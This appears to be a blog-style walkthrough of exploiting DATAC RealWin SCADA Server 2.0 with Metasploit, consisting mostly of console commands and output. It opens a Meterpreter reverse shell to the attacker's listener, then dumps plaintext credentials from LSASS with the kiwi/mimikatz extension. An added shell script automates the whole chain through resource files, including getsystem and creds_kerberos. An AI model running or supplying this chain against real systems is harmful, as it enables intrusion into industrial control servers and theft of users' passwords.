Preface
Using Metasploit to exploit DATAC RealWin SCADA Server 2.0
Attack
msf6 > use exploit/windows/scada/realwin_scpc_initialize
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/scada/realwin_scpc_initialize) > options
Module options (exploit/windows/scada/realwin_scpc_initialize):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   912              yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal
msf6 exploit(windows/scada/realwin_scpc_initialize) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 exploit(windows/scada/realwin_scpc_initialize) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1622) at 2021-05-10 21:08:49 +0800
[*] Sending stage (175174 bytes) to 192.168.1.115
Once the Meterpreter session is open, use the kerberos command to dump plaintext passwords. The command comes from the Meterpreter mimikatz/kiwi extension, so it has to be loaded first (load kiwi on current Metasploit, where the old kerberos command is called creds_kerberos), and reading credentials out of LSASS requires SYSTEM privileges on the target.
meterpreter > kerberos
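The whole procedure above (select the module, set RHOSTS and the reverse handler, run the exploit, then load the credential extension inside the session) can be scripted as Metasploit resource files instead of being typed interactively. The following shell script is an added example and is not code from the original post or from the Metasploit project; the function names (valid_ipv4, gen_msf_rc, gen_post_rc) and output file names are this example's own choices, and the post-exploitation file uses kiwi's creds_kerberos in place of the older mimikatz kerberos command, which is an assumption about the Metasploit version in use. The address check is there because the session log above shows the stage being delivered to 192.168.1.115 while RHOSTS was 192.168.1.106; the session endpoint is the source of the reverse connection, not necessarily the address you targeted, so it pays to be deliberate about which addresses go into the script.

```shell
#!/bin/sh
# Added example (not from the original post): write a msfconsole resource
# script for exploit/windows/scada/realwin_scpc_initialize and a Meterpreter
# resource script for the credential dump, validating the inputs first.

# Return 0 only for a dotted-quad IPv4 address with every octet <= 255.
valid_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for o in $(printf '%s' "$1" | tr . ' '); do
        [ "$o" -le 255 ] || return 1
    done
}

# Return 0 only for a TCP port number in 1..65535.
valid_port() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# gen_msf_rc TARGET LHOST LPORT OUTFILE
# Writes the msfconsole commands shown in the session log above. The module
# path, option names and payload are real Metasploit identifiers; RPORT 912
# is the module default and is set explicitly so the file is self-describing.
gen_msf_rc() {
    target=$1 lhost=$2 lport=$3 out=$4
    valid_ipv4 "$target" || { echo "bad RHOSTS: $target" >&2; return 1; }
    valid_ipv4 "$lhost"  || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport"  || { echo "bad LPORT: $lport" >&2; return 1; }
    cat > "$out" <<EOF
use exploit/windows/scada/realwin_scpc_initialize
set RHOSTS $target
set RPORT 912
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set EXITFUNC thread
exploit -j -z
EOF
}

# gen_post_rc OUTFILE
# Commands to run inside the Meterpreter session with "resource OUTFILE".
# getsystem is harmless if the service already runs as SYSTEM; kiwi needs
# SYSTEM to read LSASS. creds_kerberos is the kiwi name for the old
# mimikatz-extension kerberos command (assumption: Metasploit 5/6 with kiwi).
gen_post_rc() {
    cat > "$1" <<EOF
getuid
getsystem
load kiwi
creds_kerberos
EOF
}

# Usage (values taken from the session log above):
#   gen_msf_rc 192.168.1.106 192.168.1.113 4444 realwin.rc
#   gen_post_rc post.rc
#   msfconsole -q -r realwin.rc      # then: sessions -i 1 ; resource post.rc
```

The exploit is started with -j -z so the handler stays in the background and the session is not auto-interacted with; once msfconsole reports the session, attach to it and run the post file with Meterpreter's own resource command.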